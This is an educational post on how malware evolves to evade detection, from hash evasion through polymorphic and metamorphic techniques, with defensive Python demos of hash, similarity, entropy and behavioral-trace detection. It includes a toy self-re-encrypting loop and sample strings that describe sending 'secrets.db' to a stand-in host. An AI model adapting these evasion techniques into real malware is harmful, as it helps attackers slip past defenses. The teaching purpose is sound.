
Malware Typology

Polymorphic and Metamorphic Malware



Malware in a nutshell

Attack lvl 1

Malware spreads by email, as exact copies of the same file.

Defense lvl 1

Take the hash of the code before executing it. This is the first line of defense: if the hash of an unknown piece of code matches a malware blacklist, raise an alert and do not install it.

Attack lvl 2

A hash is very sensitive to change: flip a single bit and you get a completely different hash.

So circumventing the hash defense is easy: just append trash code or strings at the end of the code.

Defense lvl 2

Now hashes become useless (not entirely, but they no longer stop every attack).

To decide whether the code is genuine, the defense looks inside the code: it checks for known patterns and measures the Hamming distance between blocks of the sample and blocks of known malware.
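As an added example (not from the original post), the following Python script puts the two defenses side by side on constructed samples: a SHA-256 blacklist lookup, and a block-wise Hamming-distance score that still matches a copy with trash appended or a register renamed. The sample byte strings, the 16-byte block size and the 10% bit threshold are my own choices.

```python
import hashlib

# Constructed samples (not real malware): a reference blob, the same blob with
# trash appended (Attack lvl 2), a copy with one register renamed, and benign code.
ORIGINAL = b"MOV EAX,1; CALL connect_c2; WRITE registry_run_key; LOOP"
PADDED = ORIGINAL + b"\x00trash trash trash\x00"
MUTATED = ORIGINAL.replace(b"EAX", b"EBX") + b"\x00more trash\x00"
BENIGN = b"ADD x,y; PRINT result; RETURN 0"

# Defense lvl 1: a blacklist of SHA-256 hashes of known-bad code.
BLACKLIST = {hashlib.sha256(ORIGINAL).hexdigest()}


def hash_match(code: bytes, blacklist=BLACKLIST) -> bool:
    """Exact-match lookup: only a bit-for-bit identical copy is caught."""
    return hashlib.sha256(code).hexdigest() in blacklist


def hamming(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def block_similarity(code: bytes, reference: bytes, block: int = 16,
                     max_ratio: float = 0.10) -> float:
    """Defense lvl 2: slice the reference into fixed-size blocks and, for each,
    look for a window of `code` within `max_ratio` of its bits (Hamming
    distance). Returns the fraction of reference blocks found; trailing bytes
    that do not fill a whole block are ignored."""
    blocks = [reference[i:i + block]
              for i in range(0, len(reference) - block + 1, block)]
    if not blocks:
        return 0.0
    max_bits = int(block * 8 * max_ratio)
    found = 0
    for blk in blocks:
        best = min((hamming(blk, code[j:j + block])
                    for j in range(0, len(code) - block + 1)), default=None)
        if best is not None and best <= max_bits:
            found += 1
    return found / len(blocks)


def verdict(code: bytes) -> str:
    """Combine both defenses: exact hash first, then similarity scoring."""
    if hash_match(code):
        return "known-bad (hash)"
    if block_similarity(code, ORIGINAL) >= 0.8:
        return "suspicious (similar to known-bad)"
    return "no match"


if __name__ == "__main__":
    for name, sample in [("ORIGINAL", ORIGINAL), ("PADDED", PADDED),
                         ("MUTATED", MUTATED), ("BENIGN", BENIGN)]:
        print(f"{name:9} hash={hash_match(sample)!s:5} "
              f"sim={block_similarity(sample, ORIGINAL):.2f} -> {verdict(sample)}")
```

The padded and mutated copies both escape the hash check but score 1.0 on the block comparison, because every reference block still appears somewhere in the sample within the allowed bit distance; the benign program shares no block at all.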

Attack lvl 3: Polymorphic Malware

Since the analysis looks for similar pieces of code, the countermeasure is to encrypt the code. Under two different encryption keys, the same piece of code keeps the same size, but the two resulting strings are completely different.

What? How can it run if it is encrypted?

The key can be stored in the program itself (before or after the encrypted block), so that it can run on its own.

Or it can be remote, but in that case the malware needs to connect to a server to activate itself.

To copy itself, the malware decrypts its body, generates a new random encryption key and re-encrypts itself with it.

Defense lvl 3

You can look for encrypted parts in the code, plus the decryption module, which should be the same across the different copies of the malware.

Having an encrypted part in a program is suspicious in itself. It is fine for DRM, but in the regular case a program may obfuscate its code a bit, not encrypt it.
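Added example, not part of the original post: a toy model of Attack lvl 3 and Defense lvl 3 in Python. Each "copy" is a constant decryptor stub, a per-copy key stored before the encrypted block, and the body XORed with a SHA-256 keystream; the payload is a plain text string standing in for code. It shows that two copies have the same length but different bodies, that the stub is the invariant part a signature can match, and that the encrypted region has far higher byte entropy than plain code. The stub marker, the key length and the entropy threshold are assumptions of this example.

```python
import hashlib
import math
import os
from collections import Counter

# Constructed stand-in for the malicious body: plain text, not real code.
PAYLOAD = b"open config; read secrets.db; connect c2.example:443; send; sleep 60; " * 3

# The decryptor stub is the part every copy shares (assumed marker string).
STUB = b"DECRYPTOR_STUB:xor_sha256_stream;"
KEY_LEN = 16


def keystream(key: bytes, n: int) -> bytes:
    """Derive n pseudo-random bytes from the key: SHA-256(key || counter)."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, keystream(key, len(data))))


def build_copy(payload: bytes, key: bytes) -> bytes:
    """Layout of one copy: stub || key (kept in the program) || ciphertext."""
    assert len(key) == KEY_LEN
    return STUB + key + xor_crypt(payload, key)


def run_copy(blob: bytes) -> bytes:
    """What the stub does at run time: read the key, decrypt the body."""
    assert blob.startswith(STUB), "not one of our copies"
    key = blob[len(STUB):len(STUB) + KEY_LEN]
    return xor_crypt(blob[len(STUB) + KEY_LEN:], key)


def replicate(blob: bytes) -> bytes:
    """Attack lvl 3: decrypt, draw a fresh random key, re-encrypt."""
    return build_copy(run_copy(blob), os.urandom(KEY_LEN))


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the empirical byte distribution (max 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect(blob: bytes, entropy_threshold: float = 6.0) -> dict:
    """Defense lvl 3: match the invariant stub, and flag a body whose
    entropy is far above what plain code or text shows."""
    has_stub = blob.startswith(STUB)
    body = blob[len(STUB) + KEY_LEN:] if has_stub else blob
    ent = shannon_entropy(body)
    return {"stub_signature": has_stub,
            "body_entropy": round(ent, 2),
            "flag": has_stub or ent > entropy_threshold}


if __name__ == "__main__":
    first = build_copy(PAYLOAD, b"A" * KEY_LEN)
    second = replicate(first)
    print("same length:", len(first) == len(second))
    print("same stub:", first[:len(STUB)] == second[:len(STUB)])
    print("same body:", first[len(STUB) + KEY_LEN:] == second[len(STUB) + KEY_LEN:])
    print("plain entropy: %.2f" % shannon_entropy(PAYLOAD))
    print("verdict:", inspect(second))
```

The two checks in `inspect` are exactly the two observations of Defense lvl 3: the decryptor has to stay readable, so it is the stable thing to write a signature for, and a block of encrypted bytes looks nothing like ordinary code statistically.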

Attack lvl 4: Metamorphic Malware

OK, encrypted malware is too suspicious.

Metamorphic malware uses a different strategy to overcome traditional code analysis:

  • Add dummy comments (so strings are never equal)
  • Reorder functions
  • Rename variables
  • Add dummy functions (that do nothing, but prevent easy comparison)

Each time the malware duplicates, it modifies itself so that the copy is different.

Defense lvl 4: Sandboxing

The behavior of the malware stays the same, even after the code parts are shuffled.

To detect it, we run it in a box and watch what it actually does: file access, network access, etc. This produces "traces".

Samples are then compared using these traces: whether they behave similarly, connect to the same server, perform the same actions, and so on.

However, sandboxing is not easy, because reproducing a "true computer" is hard. A VM has no keyboard, mouse or screen, so malware can detect that it is running on an "incomplete" computer.
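Added example, not from the original post, covering Attack lvl 4 and Defense lvl 4 together: two constructed source variants of the same program (every name renamed, functions reordered, a dummy function and comments added) share few identifiers, while their constructed sandbox traces, once reduced to order-independent (operation, target) features, compare as identical, and a benign program's trace scores low. The trace line format, the loader-noise filter and the thresholds are my own assumptions.

```python
import re

# Constructed source of two metamorphic copies of the same program: every name
# is renamed, the functions are reordered, and copy B adds comments and a
# dummy function that is never called.
VARIANT_A = '''
def collect(path):  # read the target file
    data = open(path).read()
    return data
def send(host, data):
    sock = connect(host, 443)
    sock.write(data)
def main():
    send("c2.example", collect("secrets.db"))
'''

VARIANT_B = '''
# nothing to see here
def unused_helper(q):  # dummy function, never called
    return q * 2
def transmit(server, payload):
    s = connect(server, 443)
    s.write(payload)
def grab(fn):
    blob = open(fn).read()
    return blob
def main():
    transmit("c2.example", grab("secrets.db"))
'''

# Constructed sandbox traces (assumed "op key=value ..." line format). Copy B
# opens its connection before reading the file and drags in loader noise.
TRACE_A = """
open file=secrets.db mode=r
read file=secrets.db bytes=4096
connect host=c2.example port=443
send host=c2.example bytes=4096
exit code=0
"""
TRACE_B = """
open file=/lib/libc.so mode=r
connect host=c2.example port=443
open file=secrets.db mode=r
read file=secrets.db bytes=2048
send host=c2.example bytes=2048
exit code=0
"""
TRACE_BENIGN = """
open file=/lib/libc.so mode=r
open file=notes.txt mode=r
read file=notes.txt bytes=512
open file=notes.txt.bak mode=w
write file=notes.txt.bak bytes=512
exit code=0
"""


def identifiers(src: str) -> set:
    """Static, name-based view of a program: the set of identifier-like tokens."""
    return set(re.findall(r"\b[A-Za-z_]\w*\b", src))


def trace_features(trace: str) -> set:
    """Defense lvl 4: reduce a trace to order-independent (op, target) features,
    dropping volatile fields (byte counts) and loader noise under /lib/."""
    feats = set()
    for line in trace.strip().splitlines():
        op, *pairs = line.split()
        args = dict(p.split("=", 1) for p in pairs)
        if args.get("file", "").startswith("/lib/"):
            continue
        target = args.get("file") or args.get("host") or ""
        if "port" in args:
            target += ":" + args["port"]
        feats.add(f"{op}:{target}" if target else op)
    return feats


def jaccard(a: set, b: set) -> float:
    """Overlap of two feature sets, 0.0 (disjoint) to 1.0 (identical)."""
    return len(a & b) / len(a | b) if a or b else 0.0


def behaves_like(trace: str, reference: str, threshold: float = 0.8) -> bool:
    """Two samples belong together if their behavior overlaps enough."""
    return jaccard(trace_features(trace), trace_features(reference)) >= threshold


if __name__ == "__main__":
    print("identifier overlap A/B: %.2f" % jaccard(identifiers(VARIANT_A), identifiers(VARIANT_B)))
    print("trace overlap A/B:      %.2f" % jaccard(trace_features(TRACE_A), trace_features(TRACE_B)))
    print("trace overlap A/benign: %.2f" % jaccard(trace_features(TRACE_A), trace_features(TRACE_BENIGN)))
```

Renaming and reordering change what the static comparison sees, but not which file is read or which host is contacted, which is why the trace features of A and B coincide while the benign program only shares the final `exit` event.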


